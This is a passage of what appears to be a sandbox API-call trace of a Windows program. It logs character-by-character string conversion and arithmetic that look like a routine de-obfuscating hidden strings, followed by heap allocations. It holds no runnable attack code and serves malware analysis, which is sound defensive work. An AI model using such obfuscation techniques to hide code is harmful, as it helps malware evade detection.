lpUsedDefaultChar=0x0) returned 1 [0165.416] VarAdd (in: pvarLeft=0x28f9d4, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0x1090c54, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0165.416] VarCat (in: pvarLeft=0x28f92c, pvarRight=0x28f8ec, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="B", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="B\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.417] VarAdd (in: pvarLeft=0x28f9d4, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x108edfc, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0165.417] VarCat (in: pvarLeft=0x28f92c, pvarRight=0x28f8ec, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="F", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="F\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.418] VarAdd (in: pvarLeft=0x28f9d4, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x108ee14, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0165.418] VarCat (in: pvarLeft=0x28f92c, pvarRight=0x28f8ec, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="G", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="G\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.418] VarAdd (in: pvarLeft=0x28f9d4, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x1090c54, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0165.419] VarCat (in: pvarLeft=0x28f92c, pvarRight=0x28f8ec, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="F", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="F\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.419] VarAdd (in: pvarLeft=0x28f9d4, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x108edfc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0165.420] VarCat (in: pvarLeft=0x28f92c, pvarRight=0x28f8ec, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.421] VarAdd (in: pvarLeft=0x28f9e4, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x10996d4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0165.421] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f9a4, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.421] VarAdd (in: pvarLeft=0x28f9e4, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x10996fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0165.422] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f9a4, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="b\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.427] VarAdd (in: pvarLeft=0x28f9e4, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1099724, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0165.427] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f9a4, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.428] VarAdd (in: pvarLeft=0x28f9e4, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x10996d4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0165.428] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f9a4, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.429] VarAdd (in: pvarLeft=0x28f9e4, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x10996fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0165.429] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f9a4, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.429] VarAdd (in: pvarLeft=0x28f9e4, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1099724, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0165.430] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f9a4, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.430] VarAdd (in: pvarLeft=0x28f9e4, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x10996d4, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0165.430] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f9a4, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.431] VarAdd (in: pvarLeft=0x28f9e4, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x10996fc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0165.431] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f9a4, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="k", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="k\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.432] VarAdd (in: pvarLeft=0x28f9e4, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x1099724, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0165.432] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f9a4, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.433] VarAdd (in: pvarLeft=0x28f9e4, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x10996d4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0165.433] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f9a4, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.434] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x10996fc, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0165.434] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="G", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="G\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.435] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=":", cbMultiByte=1, lpWideCharStr=0x108ee2c, cchWideChar=1 | out: lpWideCharStr=":") returned 1 [0165.435] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.436] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x108ee14, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0165.436] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.437] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x10996fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0165.437] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.438] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x108ee2c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0165.438] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.443] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x108ee14, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0165.444] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.444] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x108ee2c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0165.444] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.445] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x108ee14, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0165.445] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.446] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x108ee2c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0165.446] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.447] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x108ee14, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0165.447] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.447] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x108ee2c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0165.448] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.448] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x108ee14, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0165.448] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.449] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x108ee2c, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0165.449] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.450] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="X", cbMultiByte=1, lpWideCharStr=0x108ee14, cchWideChar=1 | out: lpWideCharStr="X") returned 1 [0165.450] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.451] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x108ee2c, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0165.451] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.452] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x108ee14, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0165.452] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.453] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x108ee2c, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0165.453] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.453] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="b", cbMultiByte=1, lpWideCharStr=0x108ee14, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0165.458] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.459] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x108ee2c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0165.459] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f6aa, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01 ú(", lpUsedDefaultChar=0x0) returned 1 [0165.460] VarSub (in: pvarLeft=0x28f8fc, pvarRight=0x28f838, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x108ee14, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0165.460] VarCat (in: pvarLeft=0x28f97c, pvarRight=0x28f94c, pvarResult=0x28f8a8 | out: pvarResult=0x28f8a8) returned 0x0 [0165.461] GetCurrentThreadId () returned 0xba4 [0165.461] GetCurrentThreadId () returned 0xba4 [0165.462] IMalloc:Alloc (This=0x76da66bc, cb=0x748) returned 0x10a5e90 [0165.462] IMalloc:Alloc (This=0x76da66bc, cb=0x1000) returned 0x10a65e0 [0165.463] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x18) returned 0x2c82b58 [0165.463] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x4) returned 0x2c8bcd0 [0165.463] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x10) returned 0x2c81d20 [0165.463] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81d20 | out: hHeap=0x2c70000) returned 1 [0165.463] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8bcd0 | out: 